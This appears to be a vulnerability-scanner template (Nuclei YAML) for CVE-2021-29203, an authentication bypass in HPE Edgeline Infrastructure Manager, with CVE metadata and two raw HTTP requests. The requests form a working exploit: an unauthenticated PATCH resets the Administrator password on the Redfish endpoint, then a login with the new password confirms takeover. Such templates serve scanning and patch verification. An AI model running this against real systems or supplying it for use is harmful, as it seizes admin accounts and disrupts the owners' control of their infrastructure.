id: CVE-2021-29203
info:
  name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
  author: madrobot
  severity: critical
  tags: hpe,cve,cve2021,bypass
  description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
  reference:
    - https://www.tenable.com/security/research/tra-2021-15
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2021-29203
    cwe-id: CWE-287

requests:
  - raw:
      - |
        PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"Password":"{{randstr}}"}

      - |
        POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"UserName":"Administrator","Password":"{{randstr}}"}

    matchers-condition: and
    matchers:

      - type: status
        status:
          - 201

      - type: word
        condition: and
        part: header
        words:
          - "X-Auth-Token"
          - "PasswordReset"
          - "Location"

      - type: word
        part: body
        words:
          - "Base.1.0.Created"